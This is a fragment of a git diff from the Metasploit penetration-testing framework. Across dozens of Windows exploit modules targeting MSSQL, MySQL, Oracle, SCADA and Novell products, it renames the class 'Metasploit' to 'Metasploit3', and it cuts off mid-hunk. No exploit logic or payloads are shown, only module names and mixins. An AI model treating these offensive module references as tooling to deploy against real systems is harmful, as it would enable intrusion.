8dbb94d566..c20731b6f7 100644 --- a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb +++ b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/motorola/timbuktu_fileupload.rb b/modules/exploits/windows/motorola/timbuktu_fileupload.rb index fe0035d7a5..178db155a1 100644 --- a/modules/exploits/windows/motorola/timbuktu_fileupload.rb +++ b/modules/exploits/windows/motorola/timbuktu_fileupload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb index c84d810143..a4bb8bffe2 100644 --- a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb +++ b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/ms02_039_slammer.rb b/modules/exploits/windows/mssql/ms02_039_slammer.rb index e251c3f7e2..bebd9c7c2d 100644 --- a/modules/exploits/windows/mssql/ms02_039_slammer.rb +++ b/modules/exploits/windows/mssql/ms02_039_slammer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/ms02_056_hello.rb b/modules/exploits/windows/mssql/ms02_056_hello.rb index f1b0694ec8..91180f3205 100644 --- a/modules/exploits/windows/mssql/ms02_056_hello.rb +++ b/modules/exploits/windows/mssql/ms02_056_hello.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index de2d68ea15..fa9004658b 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index f60aabbb1b..320da58665 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL_SQLI diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index 170ae3130f..e9bc7580e0 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index 9d8c392625..d5ebe45d04 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/mssql_payload_sqli.rb b/modules/exploits/windows/mssql/mssql_payload_sqli.rb index 0973e3334e..4ab1c8beb6 100644 --- a/modules/exploits/windows/mssql/mssql_payload_sqli.rb +++ b/modules/exploits/windows/mssql/mssql_payload_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL_SQLI diff --git a/modules/exploits/windows/mysql/mysql_mof.rb b/modules/exploits/windows/mysql/mysql_mof.rb index d45b730d7f..9c292c9619 100644 --- a/modules/exploits/windows/mysql/mysql_mof.rb +++ b/modules/exploits/windows/mysql/mysql_mof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL diff --git a/modules/exploits/windows/mysql/mysql_payload.rb b/modules/exploits/windows/mysql/mysql_payload.rb index 412b25abd3..46db38c85c 100644 --- a/modules/exploits/windows/mysql/mysql_payload.rb +++ b/modules/exploits/windows/mysql/mysql_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL diff --git a/modules/exploits/windows/mysql/mysql_start_up.rb b/modules/exploits/windows/mysql/mysql_start_up.rb index 52b2513c03..5628daeca3 100644 --- a/modules/exploits/windows/mysql/mysql_start_up.rb +++ b/modules/exploits/windows/mysql/mysql_start_up.rb @@ -4,7 +4,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL diff --git a/modules/exploits/windows/mysql/mysql_yassl_hello.rb b/modules/exploits/windows/mysql/mysql_yassl_hello.rb index 2f7ac3cd77..8117dfec8f 100644 --- a/modules/exploits/windows/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/windows/mysql/mysql_yassl_hello.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index 586024d02a..44eb354357 100644 --- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL diff --git a/modules/exploits/windows/nfs/xlink_nfsd.rb b/modules/exploits/windows/nfs/xlink_nfsd.rb index 3eeb7b6854..0811a8ec5c 100644 --- a/modules/exploits/windows/nfs/xlink_nfsd.rb +++ b/modules/exploits/windows/nfs/xlink_nfsd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/nntp/ms05_030_nntp.rb b/modules/exploits/windows/nntp/ms05_030_nntp.rb index ec4670286f..d1e2bd80c7 100644 --- a/modules/exploits/windows/nntp/ms05_030_nntp.rb +++ b/modules/exploits/windows/nntp/ms05_030_nntp.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb index 8a868b2ff9..79b9157845 100644 --- a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb +++ b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/novell/groupwisemessenger_client.rb b/modules/exploits/windows/novell/groupwisemessenger_client.rb index b656afec9e..212d81188d 100644 --- a/modules/exploits/windows/novell/groupwisemessenger_client.rb +++ b/modules/exploits/windows/novell/groupwisemessenger_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/novell/netiq_pum_eval.rb b/modules/exploits/windows/novell/netiq_pum_eval.rb index 40ef9bbd07..b437751a1a 100644 --- a/modules/exploits/windows/novell/netiq_pum_eval.rb +++ b/modules/exploits/windows/novell/netiq_pum_eval.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/windows/novell/nmap_stor.rb b/modules/exploits/windows/novell/nmap_stor.rb index 88070f4bd5..36575b89bd 100644 --- a/modules/exploits/windows/novell/nmap_stor.rb +++ b/modules/exploits/windows/novell/nmap_stor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_desktop_agent.rb b/modules/exploits/windows/novell/zenworks_desktop_agent.rb index 7965f0433b..8899a87ccf 100644 --- a/modules/exploits/windows/novell/zenworks_desktop_agent.rb +++ b/modules/exploits/windows/novell/zenworks_desktop_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb index 6f25c77cfe..08817cddeb 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb index 0d66fdadeb..911d0683cf 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb index 1bfaafbac7..bbc14601ec 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb index 2d741205d8..f4930191b4 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/oracle/client_system_analyzer_upload.rb b/modules/exploits/windows/oracle/client_system_analyzer_upload.rb index 792ebb06c6..b305977fbb 100644 --- a/modules/exploits/windows/oracle/client_system_analyzer_upload.rb +++ b/modules/exploits/windows/oracle/client_system_analyzer_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Oracle Containers for J2EE/ ] } diff --git a/modules/exploits/windows/oracle/extjob.rb b/modules/exploits/windows/oracle/extjob.rb index 6335591d1d..7af245692f 100644 --- a/modules/exploits/windows/oracle/extjob.rb +++ b/modules/exploits/windows/oracle/extjob.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/oracle/osb_ndmp_auth.rb b/modules/exploits/windows/oracle/osb_ndmp_auth.rb index b7d57f7e22..bd720f2aee 100644 --- a/modules/exploits/windows/oracle/osb_ndmp_auth.rb +++ b/modules/exploits/windows/oracle/osb_ndmp_auth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::NDMP diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb index 6813232f6e..8d33b8642c 100644 --- a/modules/exploits/windows/oracle/tns_arguments.rb +++ b/modules/exploits/windows/oracle/tns_arguments.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::TNS diff --git a/modules/exploits/windows/oracle/tns_auth_sesskey.rb b/modules/exploits/windows/oracle/tns_auth_sesskey.rb index a4c703c209..228927ad94 100644 --- a/modules/exploits/windows/oracle/tns_auth_sesskey.rb +++ b/modules/exploits/windows/oracle/tns_auth_sesskey.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::TNS diff --git a/modules/exploits/windows/oracle/tns_service_name.rb b/modules/exploits/windows/oracle/tns_service_name.rb index 2c9fb69544..5dcf583fc3 100644 --- a/modules/exploits/windows/oracle/tns_service_name.rb +++ b/modules/exploits/windows/oracle/tns_service_name.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::TNS diff --git a/modules/exploits/windows/pop3/seattlelab_pass.rb b/modules/exploits/windows/pop3/seattlelab_pass.rb index 9e7d7fd0fb..2cd1ccf651 100644 --- a/modules/exploits/windows/pop3/seattlelab_pass.rb +++ b/modules/exploits/windows/pop3/seattlelab_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/postgres/postgres_payload.rb b/modules/exploits/windows/postgres/postgres_payload.rb index 48a95a69dd..9fd971c9e6 100644 --- a/modules/exploits/windows/postgres/postgres_payload.rb +++ b/modules/exploits/windows/postgres/postgres_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Postgres diff --git a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb index 0c8f0b8687..623accfec0 100644 --- a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb +++ b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] } diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb index a29a9b7402..bae54e50bb 100644 --- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb +++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/proxy/proxypro_http_get.rb b/modules/exploits/windows/proxy/proxypro_http_get.rb index 52c46f8b63..7dc8d3caef 100644 --- a/modules/exploits/windows/proxy/proxypro_http_get.rb +++ b/modules/exploits/windows/proxy/proxypro_http_get.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index e75dee83e0..25e75addc9 100644 --- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/abb_wserver_exec.rb b/modules/exploits/windows/scada/abb_wserver_exec.rb index 352485f303..cdb7cdb0d7 100644 --- a/modules/exploits/windows/scada/abb_wserver_exec.rb +++ b/modules/exploits/windows/scada/abb_wserver_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/citect_scada_odbc.rb b/modules/exploits/windows/scada/citect_scada_odbc.rb index 423aeba739..096e470c38 100644 --- a/modules/exploits/windows/scada/citect_scada_odbc.rb +++ b/modules/exploits/windows/scada/citect_scada_odbc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb b/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb index 3ee3ac4f58..709c87917f 100644 --- a/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb +++ b/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/scada/codesys_web_server.rb b/modules/exploits/windows/scada/codesys_web_server.rb index c734b4ca80..48a22d1afb 100644 --- a/modules/exploits/windows/scada/codesys_web_server.rb +++ b/modules/exploits/windows/scada/codesys_web_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb index 89440348ea..bf791cc5d9 100644 --- a/modules/exploits/windows/scada/daq_factory_bof.rb +++ b/modules/exploits/windows/scada/daq_factory_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/scada/factorylink_csservice.rb b/modules/exploits/windows/scada/factorylink_csservice.rb index f21ab94c68..d9ccff31a2 100644 --- a/modules/exploits/windows/scada/factorylink_csservice.rb +++ b/modules/exploits/windows/scada/factorylink_csservice.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/factorylink_vrn_09.rb b/modules/exploits/windows/scada/factorylink_vrn_09.rb index 1fd77ba153..01c93d561f 100644 --- a/modules/exploits/windows/scada/factorylink_vrn_09.rb +++ b/modules/exploits/windows/scada/factorylink_vrn_09.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb index 48bcd00dfa..451686637c 100644 --- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb +++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report diff --git a/modules/exploits/windows/scada/iconics_genbroker.rb b/modules/exploits/windows/scada/iconics_genbroker.rb index d64df92fcd..13b9ae70c8 100644 --- a/modules/exploits/windows/scada/iconics_genbroker.rb +++ b/modules/exploits/windows/scada/iconics_genbroker.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb index 4971af67dd..76d3ba0e37 100644 --- a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb +++ b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb index 20b39c2fa9..5e5d0fe856 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb index 59daf23440..aa2097f34f 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/igss9_misc.rb b/modules/exploits/windows/scada/igss9_misc.rb index 5a67728fa3..41ba050c1b 100644 --- a/modules/exploits/windows/scada/igss9_misc.rb +++ b/modules/exploits/windows/scada/igss9_misc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/igss_exec_17.rb b/modules/exploits/windows/scada/igss_exec_17.rb index 5bb5f73bfd..ebd1fce53c 100644 --- a/modules/exploits/windows/scada/igss_exec_17.rb +++ b/modules/exploits/windows/scada/igss_exec_17.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb index c3c0b3c6a3..2c4fa65f6b 100644 --- a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb +++ b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/moxa_mdmtool.rb b/modules/exploits/windows/scada/moxa_mdmtool.rb index 081ddc2c10..9ac1d96811 100644 --- a/modules/exploits/windows/scada/moxa_mdmtool.rb +++ b/modules/exploits/windows/scada/moxa_mdmtool.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/procyon_core_server.rb b/modules/exploits/windows/scada/procyon_core_server.rb index 4b4fb20d10..0c27241964 100644 --- a/modules/exploits/windows/scada/procyon_core_server.rb +++ b/modules/exploits/windows/scada/procyon_core_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/scada/realwin.rb b/modules/exploits/windows/scada/realwin.rb index 1c6f0f453f..bb08a5045c 100644 --- a/modules/exploits/windows/scada/realwin.rb +++ b/modules/exploits/windows/scada/realwin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb index a515f062c3..49bdb98f4c 100644 --- a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb +++ b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/realwin_on_fcs_login.rb b/modules/exploits/windows/scada/realwin_on_fcs_login.rb index 8f2b64e89b..3659a25bcb 100644 --- a/modules/exploits/windows/scada/realwin_on_fcs_login.rb +++ b/modules/exploits/windows/scada/realwin_on_fcs_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize.rb b/modules/exploits/windows/scada/realwin_scpc_initialize.rb index dbc636e3f1..6639e8f9d1 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb index a454ad7c26..ae8957925b 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb index ec76d4e654..1ea64e355b 100644 --- a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb +++ b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb index c7818c370f..4a8e6d2e04 100644 --- a/modules/exploits/windows/scada/scadapro_cmdexe.rb +++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb b/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb index 96f573690d..1360a3e0d3 100644 --- a/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb +++ b/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb @@ -5,7 